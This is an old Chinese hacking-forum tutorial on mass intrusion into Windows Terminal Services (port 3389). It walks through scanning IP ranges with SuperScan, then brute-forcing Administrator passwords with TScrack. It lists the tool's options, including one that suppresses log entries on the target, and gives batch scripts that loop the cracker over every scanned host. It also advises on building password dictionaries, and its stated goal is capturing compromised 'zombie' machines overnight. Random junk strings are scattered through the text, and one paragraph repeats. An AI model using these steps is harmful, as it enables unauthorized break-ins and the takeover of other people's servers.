QQ登录

只需要一步,快速开始

 注册地址  找回密码
查看: 2693|回复: 0
打印 上一主题 下一主题

终端服务真正的另类入侵

[复制链接]
字体大小: 正常 放大
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

跳转到指定楼层
1#
发表于 2004-10-6 09:51 |只看该作者 |倒序浏览
|招呼Ta 关注Ta

作者:霜风 QQ:14226581

6 [2 |, W3 h* P5 Z) `, H

终端服务又称3389服务,它提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。& G- o# C/ h# @7 m! K7 l; A7 L) f* e 这样的服务因为操作简便和功能强大而著称,深受广大管理员和黑友们的欢迎,其实这个题目在很早以前就有前辈写过,但适值今日,那个老方法成功率已经越老越低了,为什么呢?要我先把前辈们的方法概述一下: 9 a& i5 N% X$ h: _1 ?2 i; {' R. g4 ^0 _ 首先用superscan把所有开3389的主机都扫下来,接着用x-scan扫他们的弱口令,具体方法如下: , ^) N% e. ]9 I/ a先打开superscan3如图1( l! j [9 u; P) V; E" ^' |0 A& Z / V5 [# z' k7 O8 x3 V; @6 z此主题相关图片如下:9 t1 h0 M( }! I- g$ P

& i* C' G; B# f( r7 a

% M, |: W1 e3 l接着输入其实IP和终止IP,填好以后在把“所有端口定义”的两个空改为3389,接着把左边的速度调到最快,最后点开始,进度条走完以后,点删除,整理点展开所有以后如图26 R: a' b) x4 r. a9 y8 u ' ~* y/ ]# m3 S& i7 ?7 s此主题相关图片如下: & l n% _" B2 c' }4 q& y L0 ~7 g) H7 b' M" D& J

) ~1 L- `2 U0 c+ R

然后点保存,接着打开保存的文件,把所有的“* + ”和“|___ 3389”都删除.. {' \8 G |$ N) e* S 这里告诉大家一个小技巧,进入—替换—在查找内容把“* +”填上,然后点全部替换如图3 + S& c- z- H6 ^9 d- T+ F3 I; X. g! d U# Y8 }# |& k 此主题相关图片如下:" E: k7 B& y. n. m* w1 y$ W1 g8 Q# n

! c6 d- `7 C9 L4 `

- @; K! p8 {5 ?4 I( J, _. W “|___ 3389”的删除方法如上,最后输入空格,把空格替换掉,整理完毕后如图4。: A* n2 ]4 p! s+ x- U) Y/ F6 o; Q9 s 7 r, C2 y9 M) S7 z6 A/ @ 此主题相关图片如下: 4 n7 z3 ] a" g5 J) r5 E$ r

$ C9 D" F) m0 }$ q. i; G* F( m) e! U

接着打开X-SCAN,进入—设置—扫描参数,把从“从文件获取主机列表”打上勾,选上刚刚整理的文件后如图5 . d7 m# t/ |) {( q" I. h: V 3 _+ F! [/ o. x: E% k8 ]" C此主题相关图片如下:' d: Z& \2 }" ^# o- o; m

3 _6 G U' v: h F

进入“扫描模块”只把两项打上勾:"NT-server弱口令""sql-server弱口令”,OK后就点绿箭头开始了,这种方法在以前是非常有效的,一天搞几十个不是问题,但现在许多用管理员已经把139后445的端口封了,这样就不能得到netbios信息了,X-SCAN也就不能扫NT若口令了,对付XP更是束手无策,SQL-SERVER若口令更加如大海落针,读者们肯定又要问了,我们到底怎么办呢?别急,我马上娓娓到来。 7 c5 ~- V% k8 L0 [2 L( r% X所需工具:TScrack.exe所需工具:TScrack.exe,一个记事本。8 K0 @ ?4 E0 o5 V6 g) ~8 t4 g TScrack.exe是针对终端服务的一个密码破解程序.这个程序被微软推荐给用户使用,来检查终端服务密码的强壮性.程序使用msrdp控件,可在本地虚拟远程终端连接窗口,通过密码字典进行破解. 可以指定多种参数,使用比较灵活,破解速度视攻击主机与被攻击主机网络带宽而变化.,一个记事本。$ Z- G1 ~; X4 w7 e2 a 此软件可以只利用3389服务的登陆框猜解密码,不再以来原先的139端口了,废话少说来看具体操作。 ! }* a9 j* v+ e# r& f5 M在CMD下启动TScrack.exe,会首先分离出main_scraper.nnt,MSRDP.OCX,MSWINSCK.OCX这几个文件,然后就可以正常运行了,TScrack.exe一共有这几个选项: ! o( E) b3 x/ j) y/ Z! t( Z-h : Print usage help and exit 7 G4 K3 {/ \: D' F3 t' z) n8 d1 Y% {-V : Print version info and exit2 u0 i6 P0 \; O' d( ~% Z' M -s : Print chipher strenght info and exit! @# j0 m3 }% G. r -b : Enable failed password beep/ V. S5 i" K' o; ?6 \# J' d -t : Use two simultaneous connections [EXPERIMENTAL]) r; i; Z& H6 I; X -N : Prevent System Log entries on targeted server% K4 u% F6 W, H9 g -U : Uninstall tscrack and remove components" V# n1 y$ o0 @; R+ h9 C -f <number> : Wordlist entry to start cracking with& w3 q2 f( s1 i* m# W -F <delay> : Sampling Frequency (Delay between samples in ms) ' [. |* a7 [1 b! o( `$ G8 l* g-l <user> : Account name to use, defaults to Administrator ) D- q( c8 W7 c/ |! `' l: v: f5 L ]-w <wordlist> : Wordlist to use; tscrack tries blank passes if omitted C$ S! o9 s8 c9 H0 H# ^9 w -p <password> : Use <password> to logon instead of wordlist/blank pass$ z+ U; q& u- ?. o# W7 J/ v/ \ -D <domain> : Specify domain to attempt logon to

" |, {* e2 i( j% s" R/ C3 }5 O, H0 e l2 J, e& Z % R8 Q6 v( A5 V5 i 我就帮忙翻译一下吧,翻译得不好可不要怪我啊: : N, h4 {! d- l: Q-h : 显示使用帮助然后退出 0 P- p! f9 N6 Y( P8 R-V : 显示版本信息然后退出 & ~8 S. m7 ?8 X. Z( J-s : 显示 chipher strenght信息然后退出(chipher strenght具体意思不明) . M5 M! }0 W3 m, s" [; }! ^, R-b : 密码错误时发出声音 + O n. a! e9 H/ D0 q$ I6 J-t : 同时发出多个连接,就是多线程。 3 |6 M, P8 P% N2 V3 P7 p( B-N : Prevent System Log entries on targeted server , k6 F+ f6 S1 ]-U : 卸载移除tscrack组件。 - l* p1 B( [- g' D: B$ p* s/ P% e-f <number> : 使用-F后面的密码。, t! a" E/ G0 N! B1 g: V5 Q7 L -F <delay> : 间隔时间(频率)) N& Z1 ~ o8 `4 A, ^ -l <user> : 使用-L后面的用户名 ) c- ~" k& ]0 a) Z( _-w <wordlist> : 使用-W后面的字典 . P7 p q' R0 z/ K( v2 Y-p <password> : 使用-W后的密码 " m5 v* v6 y8 { z/ F& G-D <domain> : 登陆主页面?

, ] M8 p) I3 q3 K$ c相信通过上面的功能介绍,大家对TScrack.exe都应该有所了解了吧,下面就是实例操作了,首先就是用SUPERSCAN把3389机扫下来吧,整理后保存,IP数一般在100个左右,保存好后,就用记事本写一段BAT了名字为3389,把下面的代码写入记事本:7 `! ~9 P( h0 t' ]5 G! w6 w7 t @if not exist IpcScan.txt goto noscan! ?: b% T: X6 p8 ]% c* R; C @for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i $ }" @$ j# l: t9 a, u7 c:noscan8 p, v8 {' p8 g( A& w( N9 A @echo 3389.txt no find or scan faild

% O+ x" @5 M1 B1 r" w% [ 这段代码的大概意思是从3389.txt(刚刚用SUPERSCAN保存后的文件)里取一段字符,接着运行hack 这段字符(也就是IP)

. ?( }8 W6 e; s" D" f 保存后把后错名改为BAT就可以了。 9 c- B5 C: T+ X- d% O3 B0 Q还写一个BAT,名字为HACK.BAT,代码如下:

6 k! U$ X; ^. E@if not exist tscrack.exe goto noscan & V% `4 J# P. {* ]@tscrack %1 -l administartor -w pass.dic >>rouji.txt! a9 u4 I6 `: ?3 R8 B4 R+ I+ G, a :noscan # z- b" Z6 m% X8 N. G@echo tscrack.exe no find or scan faild

6 q, ~% s) B2 M/ S4 ?, Z0 |这段代码的意思是:运行tscrack,用户名为administrator 字典文件为PASS.DIC2 u `% ~; s$ | 制作方法如上。8 J D M* H9 q3 E3 C 然后就是制作字典了,制作字典最关键的就是选一个好的字典工具,我这里选择了"万能钥匙"这个字典生成器,虽然是老了一点,但功能绝对是所有字典里最强大的,唯一的缺点就是不能使用基本字符定义,不过其他功能还是很不错,界面如图6 , t2 }; e" J* f6 g7 h% K1 O& p8 y0 C 此主题相关图片如下:: A, `0 G& P* b' v! J8 k

怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic. # k2 ~' `: e+ ?* D+ G* ^6 q8 E最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7 $ C2 }6 o3 B2 M , s$ h% {+ c, z6 C( Y) S; v$ C( P此主题相关图片如下:6 s/ H% m- U" S( b 2 H5 ?! P) B& i2 p0 }" }0 Y怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.1 _# K1 D1 I) S# b4 @( ^7 b 最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7,接下来做的事就是等待了,及结果保存在ROUJI.TXT里,放在肉鸡上一晚上搞10来个极品肉鸡都有可能,也欢迎大家与我交流~
zan
转播转播0 分享淘帖0 分享分享0 收藏收藏0 支持支持0 反对反对0 微信微信
您需要登录后才可以回帖 登录 | 注册地址

qq
收缩
  • 电话咨询

  • 04714969085
fastpost

关于我们| 联系我们| 诚征英才| 对外合作| 产品服务| QQ

手机版|Archiver| |繁體中文 手机客户端  

蒙公网安备 15010502000194号

Powered by Discuz! X2.5   © 2001-2013 数学建模网-数学中国 ( 蒙ICP备14002410号-3 蒙BBS备-0002号 )     论坛法律顾问:王兆丰

GMT+8, 2026-8-30 19:00 , Processed in 0.372842 second(s), 51 queries .

回顶部